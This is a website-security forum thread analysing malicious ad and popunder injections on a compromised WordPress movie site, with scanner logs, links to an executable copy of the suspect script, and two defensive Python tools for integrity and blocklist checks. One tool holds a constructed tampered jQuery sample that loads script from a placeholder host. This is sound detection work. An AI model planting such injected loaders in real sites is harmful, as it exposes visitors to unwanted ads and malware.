L.S.
What code and where did we stumble upon it? → third-party code integrity - htbridge scan alerts
Attackers often hide backdoors, crypto-jacking malware and other malicious code inside legitimate third-party JS (various libraries and frameworks). We check if a particular version of the third-party JS code was altered with new code, and report any anomalies here.
-http://www.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
The JS seems to differ from the original code. Altered integrity may indicate a compromise.
The following JS components were found inside:
- jQuery [1.12.4]
and via an unpacker error:
wXw.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
status: (referer=XXX/web?q=xxx)saved 118689 bytes 055e2b734ec4d2ede0c5ef8003510140a602ebf4
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [decodingLevel=0] found JavaScript
error: undefined variable n
file: 055e2b734ec4d2ede0c5ef8003510140a602ebf4: 118689 bytes
Consider: http://www.domxssscanner.com/scan?url=http://www.watchonlinemovies.pk/wp-content/cache/minify/115b0.js
Going to -https://ads.exosrv.com/ads.js and/or -https://ads.exosrv.com/popunder1000.js,
both blocked according to Peter Lowe’s Ad and tracking server list by uBlock Origin.
Site has an outdated CMS (WordPress, version from source: 4.9.5),
site has malware detected, site is blacklisted…
Malware (12 instances detected) = http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1 e.g. Various malicious injections that result in displaying ads (or opening pop-up or pop-under windows) without the site owner’s consent. Such injections may utilize scripts from legitimate ad networks. We had popunder1000.js found blocked here.
Also detected: labs.sucuri.net/db/malware/malware-entry-mwblk2 → The web site contains a remote javascript or iframe that is currently blacklisted. That can be used to infect visitors of your own web site and generate cross-site warnings. If you don’t have access to the remote site, remove the link (or iframe or javascript) from your site pointing to it. This is based on web reputation verification. Info credits Sucuri Research Scan Results & htbridge.com WebScan results.
polonus (volunteer website security analyst and website error-hunter)
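The integrity alert quoted above boils down to one check: does the served copy of a library match the bytes of the version it claims to be? The script below is an added example of that check and is not htbridge's or Sucuri's code. It uses a constructed stand-in for a pristine jQuery 1.12.4 build and a constructed tampered copy with an appended ad-loader (the popunder pattern discussed in the post; the host name in it is a placeholder). It classifies a mismatch as "code wrapped around an intact library" versus "library body itself changed", and prints the Subresource Integrity digest a site owner would pin so a browser refuses an altered copy. One caveat for this thread: the flagged file lives under wp-content/cache/minify/, so it is a cache-plugin bundle that may legitimately differ byte-for-byte from upstream jQuery; a whole-file hash mismatch is a lead to inspect, not proof of compromise on its own.

```python
import base64
import hashlib
import re
from typing import Optional

# Constructed stand-in for a pristine jQuery 1.12.4 build (the real file is
# about 97 KB; only the header comment and a closing wrapper are mimicked).
REFERENCE_JS = (
    "/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */\n"
    "!function(a,b){\"object\"==typeof module&&\"object\"==typeof module.exports"
    "?module.exports=b(a):b(a)}(\"undefined\"!=typeof window?window:this,"
    "function(a,b){return{fn:{jquery:\"1.12.4\"}}});\n"
)

# Constructed tampered copy: the library bytes are intact, but a loader for an
# ad-network script was appended. ads.example.invalid is a placeholder host.
TAMPERED_JS = REFERENCE_JS + (
    "(function(){var s=document.createElement('script');"
    "s.src='//ads.example.invalid/popunder.js';"
    "document.head.appendChild(s);})();\n"
)

VERSION_RE = re.compile(r"jQuery v(\d+\.\d+\.\d+)")


def declared_version(js: str) -> Optional[str]:
    """Version the file claims in its header comment. This is what a scanner
    reports as 'jQuery [1.12.4]'; it is trivially forgeable, so it is only a
    hint about which reference copy to compare against."""
    m = VERSION_RE.search(js)
    return m.group(1) if m else None


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Digest in the form a <script integrity="..."> attribute takes."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def check_integrity(served: str, reference: str) -> dict:
    """Compare a served copy with the pinned reference and classify the delta."""
    s, r = served.encode(), reference.encode()
    result = {
        "declared_version": declared_version(served),
        "reference_version": declared_version(reference),
        "served_sri": sri_hash(s),
        "reference_sri": sri_hash(r),
    }
    if s == r:
        result["status"] = "match"
    elif r in s:
        # Library intact with extra code around it: typical of an injected loader
        idx = s.index(r)
        result["status"] = "altered"
        result["prepended"] = s[:idx].decode(errors="replace")
        result["appended"] = s[idx + len(r):].decode(errors="replace")
    else:
        # Bytes changed inside the library body (or a different minifier/bundle)
        result["status"] = "altered"
        result["detail"] = "library body differs from reference"
    return result


def sri_script_tag(src: str, reference: str) -> str:
    """Tag pinning the reference copy: the browser will not execute a served
    copy whose digest differs, which blocks exactly this class of tampering."""
    return (f'<script src="{src}" integrity="{sri_hash(reference.encode())}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    for label, js in (("reference", REFERENCE_JS), ("tampered", TAMPERED_JS)):
        r = check_integrity(js, REFERENCE_JS)
        print(label, r["status"], r.get("appended", "")[:60])
    print(sri_script_tag("/wp-content/cache/minify/115b0.js", REFERENCE_JS))
```

On a real site the reference bytes come from the vendor's own download or the project's git tag, never from the suspect server, and the digest is computed over the exact bytes served (after decompression) rather than over a re-minified copy.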
Checked the code URI at VT and only Fortinet’s alerts as suspicious: https://www.virustotal.com/nl/url/62fefc7a356ffabf9bff21201890c883d531ca0bbffd713ca993bc162618de85/analysis/1531403940/ Nothing on file detection: https://www.virustotal.com/nl/file/7ae9066cdeb227cb26d41ab6fc3404c373b7b3edc33773e3e2e75992ba29b216/analysis/1510180615/
I created a plunker for that suspicious code to analyze it better,
for researchers only; normally do not visit the link.
See: http://plnkr.co/edit/W5GDM0JU0nq4bHl7cxKV?p=preview
Open up the embedded view (for security research only) here: http://embed.plnkr.co/W5GDM0JU0nq4bHl7cxKV/
AdRemover 8.5 has finished its work! [296 ms]
Syntax error @ “Translate_This”!
Syntax error @ “FireHol Fossies”!
Syntax error @ “Bro IDS”!
Syntax error @ “Secure.js”!
Syntax error @ “DNS Rebinding Protection Script”!
Starting AdRemover 8.5 on -http://run.plnkr.co/preview/cjjilwbgv0005395snrc3tstm/ 4 seconds after page load …
Run: -http://run.plnkr.co/preview/cjjilwbgv0005395snrc3tstm/ (for security research only).
When running it in a JavaScript unpacker, the Google Chrome browser prevents this. Something phishy out there for sure.
Sucuri’s detects malcode → https://sitecheck.sucuri.net/results/www.watchonlinemovies.pk
Also Quttera’s detects - https://quttera.com/detailed_report/www.watchonlinemovies.pk
46 instances of detected malicious inserted JavaScript code.
polonus (volunteer website security analyst and website error-hunter)
Code errors from what Sucuri’s flags:
wXw.watchonlinemovies.pk/wp-content/themes/dramatvpk/js/ie6PngFix.js
status: (referer=XXX/web?q=puppies)saved 11010 bytes 4951b40a8c748b1e0953680de5b1b77d78618e64
info: [decodingLevel=0] found JavaScript
error: undefined variable document.documentElement.firstChild
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var document.documentElement.firstChild = 1;
error: line:1: ....^
info: [element] URL=wXw.watchonlinemovies.pk/wp-content/themes/dramatvpk/js/undefined
info: [1] no JavaScript
file: 4951b40a8c748b1e0953680de5b1b77d78618e64: 11010 bytes
file: 13532b7da4041b6f071fa13e0d5fbc64ccfa6e40: 74 bytes
&
info: [script] go.oclasrv.com/apu.php?zoneid=1391279
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing = in XML attribute:
error: line:3: ]
error: line:3: .................................................................................^
See: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.watchonlinemovies.pk%2Fwp-content%2Fthemes%2Fdramatvpk%2Fjs%2Fie6PngFix.js&ref_sel=GSP2&ua_sel=ff&fs=1
pol
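The other recurring finding in this thread is a page pulling in remote script or iframe sources that sit on an ad/tracking blocklist (the exosrv.com popunder in the first post, the go.oclasrv.com apu.php script in the scan output just above). The code below is an added example of that audit and is not Sucuri's, uBlock Origin's or jsunpack's code. It parses a constructed page fragment that embeds those two script URLs plus a same-origin bundle, an inline script, a remote iframe and an unlisted CDN script, resolves each src against the page URL (protocol-relative `//host/...` included), and matches the host and its parent domains against a constructed hosts-format blocklist excerpt in the layout Peter Lowe's list uses. Only ads.exosrv.com is in that excerpt because the post states it is blocked; whether go.oclasrv.com or any other host is actually listed has to be checked against the real list, and the example reports it as a remote script to review rather than as blocked.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed excerpt in hosts-file layout (one "<ip> <hostname>" per line).
# tracker.example is a placeholder; exosrv.com is the host the post names.
BLOCKLIST_TEXT = """# Ad and tracking server list, constructed excerpt
127.0.0.1 ads.exosrv.com
0.0.0.0 tracker.example
"""

# Constructed page fragment. The two remote script URLs are the ones quoted
# in the thread; the page origin and the CDN host are placeholders.
PAGE_URL = "http://www.example.invalid/"
PAGE_HTML = """<html><head>
<script src="/wp-content/cache/minify/115b0.js"></script>
<script src="//go.oclasrv.com/apu.php?zoneid=1391279"></script>
<script type="text/javascript" src="https://ads.exosrv.com/popunder1000.js"></script>
<script src="https://cdn.example.invalid/lib.js"></script>
<script>console.log("inline, no src")</script>
</head><body>
<iframe src="https://tracker.example/frame.html" width="1" height="1"></iframe>
<img src="https://cdn.example.invalid/logo.png">
</body></html>"""


def parse_hosts_blocklist(text: str) -> set:
    """Hostnames from a hosts-format list; plain one-column lists also work."""
    blocked = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # strip comments and blanks
        if line:
            blocked.add(line.split()[-1].lower())
    return blocked


def is_blocked(host: str, blocked: set) -> bool:
    """True if the host or any parent domain is listed (a.b.c matches b.c)."""
    labels = host.lower().split(".")
    return any(".".join(labels[i:]) in blocked for i in range(len(labels)))


class RemoteResourceParser(HTMLParser):
    """Collect script and iframe sources that resolve to another origin."""
    TAGS = {"script": "src", "iframe": "src"}

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.base_host = urlsplit(base_url).hostname
        self.remote = []   # (tag, absolute url, host)

    def handle_starttag(self, tag, attrs):
        attr = self.TAGS.get(tag)
        src = dict(attrs).get(attr) if attr else None
        if not src:
            return                      # inline script or missing attribute
        url = urljoin(self.base_url, src)   # handles relative and //host forms
        host = urlsplit(url).hostname
        if host and host != self.base_host:
            self.remote.append((tag, url, host))


def audit_remote_resources(html: str, base_url: str, blocklist_text: str) -> list:
    """Return (tag, url, host, listed) for every cross-origin script/iframe."""
    blocked = parse_hosts_blocklist(blocklist_text)
    parser = RemoteResourceParser(base_url)
    parser.feed(html)
    return [(tag, url, host, is_blocked(host, blocked))
            for tag, url, host in parser.remote]


if __name__ == "__main__":
    for tag, url, host, listed in audit_remote_resources(PAGE_HTML, PAGE_URL, BLOCKLIST_TEXT):
        verdict = "LISTED" if listed else "review"
        print(f"{verdict:7} <{tag}> {url}")
```

The same-origin bundle and the inline script are deliberately left out of the report: this audit is about who else the page hands execution to, and a site owner who cannot explain a remote script or a 1x1 iframe in a theme has the injection Sucuri's mwblk2 entry describes.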